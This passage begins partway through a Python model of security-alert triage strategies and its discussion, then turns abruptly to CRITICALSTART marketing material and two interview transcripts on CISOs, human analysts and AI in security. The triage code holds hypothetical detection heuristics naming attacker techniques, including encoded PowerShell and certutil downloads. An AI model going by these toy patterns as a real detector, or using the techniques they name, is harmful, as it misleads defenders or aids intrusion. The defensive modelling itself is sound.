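    raw = "|".join([alert.source, alert.process.lower(), alert.parent.lower(), masked_cmd])
    return hashlib.sha256(raw.encode()).hexdigest()


def input_oriented(alerts, disabled_sources):
    """Turn off the noisy feeds. Whatever they would have raised is never seen."""
    reviewed = [a for a in alerts if a.source not in disabled_sources]
    unreviewed = [a for a in alerts if a.source in disabled_sources]
    return {"reviewed": reviewed, "unreviewed": unreviewed}


def priority_oriented(alerts, capacity):
    """Work from critical downward until analyst capacity is exhausted."""
    queue = sorted(alerts, key=lambda a: (-SEVERITY_RANK[a.severity], a.id))
    return {"reviewed": queue[:capacity], "unreviewed": queue[capacity:]}


def constructed_verdict(alert: Alert) -> str:
    """Stand-in for the analyst's disposition: hypothetical heuristics, not a detector."""
    cmd, proc, parent = alert.cmdline.lower(), alert.process.lower(), alert.parent.lower()
    suspicious = (
        "-enc" in cmd.split()
        or (proc.endswith("certutil.exe") and "-urlcache" in cmd)
        or parent.endswith("w3wp.exe")
        or "\\temp\\" in proc
    )
    return "malicious" if suspicious else "benign"


def resolve_every(alerts, verdict, trusted=None):
    """Every alert gets a disposition. Benign behaviours enter the trusted set and
    their repeats are auto-resolved; malicious ones are escalated, never trusted."""
    trusted = set() if trusted is None else trusted
    analyst_reviewed, auto_resolved, escalated = 0, [], []
    for a in alerts:
        key = behavior_key(a)
        if key in trusted:
            auto_resolved.append(a.id)
            continue
        analyst_reviewed += 1
        if verdict(a) == "benign":
            trusted.add(key)
        else:
            escalated.append(a.id)
    return {"analyst_reviewed": analyst_reviewed, "auto_resolved": auto_resolved,
            "escalated": escalated, "unreviewed": [], "trusted_size": len(trusted)}


if __name__ == "__main__":
    print("input-oriented, never seen:", [a.id for a in input_oriented(ALERTS, {"ids", "siem"})["unreviewed"]])
    print("priority-oriented, never reached:", [a.id for a in priority_oriented(ALERTS, 4)["unreviewed"]])
    print("resolve-every:", resolve_every(ALERTS, constructed_verdict))
```

On this constructed set, switching off the IDS and SIEM feeds hides four alerts, all of which the stand-in analyst would have called malicious. Working criticals downward with capacity for four alerts reviews the critical, both highs and one medium, and never reaches alert 10, a medium-severity certutil download. The resolve-every model sends seven alerts to an analyst, auto-resolves three repeats and leaves nothing unreviewed. The part a practitioner should scrutinise is `behavior_key`: a key that is too coarse (image name only) lets one benign disposition silence a malicious variant, while a key that is too fine (host plus the raw command line) never deduplicates anything and the fatigue the text describes comes straight back.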

Podcast: The Last Watchdog Interview with Randy Watkins

“Security is really the art of handling risk” – Randy Watkins, CTO of CRITICALSTART.

It’s clear that managed security services providers (MSSPs) have a ripe opportunity to step into the gap and help small-to-medium-sized businesses (SMBs) and small-to-medium-sized enterprises (SMEs) meet the daunting challenge of preserving the privacy and security of sensitive data.

CRITICALSTART is making some hay in this space — by striving to extend the roles traditionally played by MSSPs. The company has coined the phrase managed detection and response, or MDR, to more precisely convey the type of help it brings to the table.

Recently our CTO, Randy Watkins, spoke to Byron Acohido of The Last Watchdog about the difference between ‘risk-oriented’ and ‘control-based’ security and how quantifying risk is the first step to defending against network breaches.

Read Acohido’s blog and listen to the full podcast interview

The Last Watchdog | October 4, 2019

Security and the Human Element: The Need for the Organizational CISO

In cybersecurity, humans will always have a role to play. Security incidents involve critical decisions that require human analysis. CRITICALSTART’s Jordan Mauriello and Michael Balboni, President of Redland Strategies, former Senator, Assemblyman and advisor to Homeland Security, have some thoughts on the role of humans and where machines fit into cybersecurity.

Full Transcript:

Hey guys, Jordan Mauriello with CRITICALSTART here, Senior Vice President of Managed Services. Today I have with me Michael Balboni, President of Redland Strategies, former Senator, Assemblyman, advisor to Homeland Security. Honored to have him here with us today. We’ve been doing some awesome discussions about things that we’re doing at CRITICALSTART and working with Redland Strategies.

Today we wanted to take an opportunity just to talk to Michael about some general cybersecurity issues. He’s a major influencer in our community. I know many of you already know who he is, and he has had a major impact even on some of the legislation that we’ve seen around our industry as well. We want to take the time to get some thoughts from him on some of the direction the industry’s going and the impact that some of the changes we see in cyber in general are having on national defense, the role of Senate and Congress, and where that’s going from a legislative perspective.

We’re going to open up and have a nice, fun conversation here about some of these issues. Thank you so much for being with us, Michael.

Thanks for having me, Jordan, and thanks for your service to the country in the military.

Thank you very much, sir. I appreciate your support.

You definitely see this massive difference in organizations and capability, and there’s not a standard set maturity. We have some customers that we walk in and we can’t believe how mature they are. Great leadership and they really understand the problems, they know the industry, and generally what we see are guys who have the right experience, who come from backgrounds that we’d kind of expect, with the technical understanding and knowledge.

A lot of times they’re from government cybersecurity roles and they have the understanding of how to come in and identify and begin to protect against a threat. But we don’t have a standard that we’re committing to either, even though we have some great ones. The NIST Cybersecurity Framework is fantastic, but how many organizations are actually committing to and doing that today? It’s very, very few.

It’s amazing how many corporations that I’ve seen from a $25 million to a $100 million capitalization that don’t even have a Chief Information Security Officer. It’s their IT guy and their physical security guy, and never the twain shall meet. It’s still that divide. I think that obviously one of the key requirements under NIST is to have a Chief Information Security Officer, to have one person who’s responsible for not only setting up the different security architectures, but then monitoring the network, devising a response protocol and being able to call out to different vendors so that you can bring people in and say, “First of all, let’s do a penetration test on my network.” Really, really crucial. Let’s have a vulnerability assessment, periodically. Let’s have training of staff. We always say that defense should be totally, completely automated. Not always. There is a human interface. It’s very important.

It depends upon where in the kill chain, that is the Lockheed Martin-developed set of steps that an attacker has to take to make something a weapon and insert it into a network. Where along the kill chain can a human interface come in and recognize the threat and stop it? We’ve kind of lost it. We want to say, as they say, the Terminator kind, machine versus machine. There should be no humans involved. Well, no. That’s not exactly correct. Humans have a role to play. It’s just perhaps further down the line, when a threat has been identified and there is a resolution to that threat, then the human can play a role in that.

Yeah, I completely agree. I think the importance of artificial intelligence and machine learning has been massively overplayed in our space right now. They become buzzwords and everybody wants to throw them in their technology and say they have ML or AI. The reality of it is it’s still a very limited technology set. You cannot do causation with AI or ML today.

Explain that to me. What do you mean by causation?

AI and ML cannot answer why something happened for you. When you’re getting to what should be the human interface point in security, maybe you’re using some sort of analytic engine to distill down data. You get an incident that requires analysis and you want to ask, “Why did this happen? What’s the root cause of this incident, and can I prove that known good or known bad?” That requires a human. It’s a critical decision-making factor that requires human analytics, and the machine can’t do that for us yet. Nobody in the world can with AI yet.

Now that’s not to say it won’t. In fact, I think one of the fathers of modern machine learning and AI, Judea Pearl, wrote a great book recently and I highly recommend, called “The Book of Why”. He’s talking specifically about this problem. We can’t do causation yet with AI and ML. We still need to understand that it’s use case-specific, that it applies to certain things, that it can do detection for us, that it can produce maybe some visibility mechanisms we didn’t have before. The end of it, when you’re answering, “Why did that happen and what do I need to do to respond,” that’s a human and it still needs to be a human.

Securing Data: The Importance of Understanding Your Most Valuable Assets

With multiple data points that exist in organizations, how do you know what you need to protect? What constitutes reputational damage or breach for you as a company? CRITICALSTART’s SVP of Managed Security, Jordan Mauriello, and former Homeland Security advisor Michael Balboni share insights on securing data and how to protect your most valuable assets.

Full Transcript:

JM: Hey guys, Jordan Mauriello with CRITICALSTART here, Senior Vice President of Managed Services. Today I have with me Michael Balboni, President of Redland Strategies, former Senator, Assemblyman, advisor to Homeland Security. Honored to have him here with us today. We’ve been doing some awesome discussions about things that we’re doing at CRITICALSTART and working with Redland Strategies.

JM: Today we wanted to take an opportunity just to talk to Michael about some general cybersecurity issues. He’s a major influencer in our community. I know many of you already know who he is, and he has had a major impact even on some of the legislation that we’ve seen around our industry as well. We want to take the time to get some thoughts from him on some of the direction the industry’s going, the impact that some of the changes we see in cyber in general are having on national defense, the role of Senate and Congress, and where that’s going from a legislative perspective.

JM: We’re going to open up and have a nice, fun conversation here about some of these issues. Thank you so much for being with us, Michael.

MB: Thanks for having me, Jordan, and thanks for your service to the country in the military.

JM: Thank you very much, sir. I appreciate your support.

JM: You know, we haven’t even necessarily decided what to protect. One of the things that I see even as a consultant in doing CISO work for organizations is going in. The first question we’re always asking is “What are the crown jewels? What do you need to protect? What’s important to your business? What constitutes reputational damage or breach for you as a company?” You start with that question and I think often from a national defense perspective that we’re not properly gathering the data on what that answer is. I don’t think we necessarily know exactly what things are the most important to us. We look at the defense systems themselves and we look at DOD and we say, “Okay, well here are our military assets. Let’s protect those vehemently.”

JM: What about the supporting infrastructure? Are we doing enough to protect SCADA systems and critical infrastructure here? I think the answer to that, like you said, is that it’s woefully uninvested or under-invested, and we’ve seen that generally too out in the field as we go out there. We’re very often surprised as we walk into organizations that we would expect to be at a very high standard to see that the decisions around risk that are being made in those organizations are definitely not what we would expect.

MB: In the board rooms, typically board members don’t have an appreciation of the exposure that cyber creates for them. They may have a pretty good understanding of what their regulatory requirements are, but they’re not in the weeds as to what steps are being taken every day to make sure that their network is safe and operational. A lot of times, they believe in the mission of the corporation, the mission of the board, and that’s what you drive to, and cybersecurity is kind of a one-off. “Yeah, okay. We got to check that box,” but in checking that box, you don’t ask the deeper probing questions, and that’s because it’s frankly just too complex.

©2020 CRITICALSTART. This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.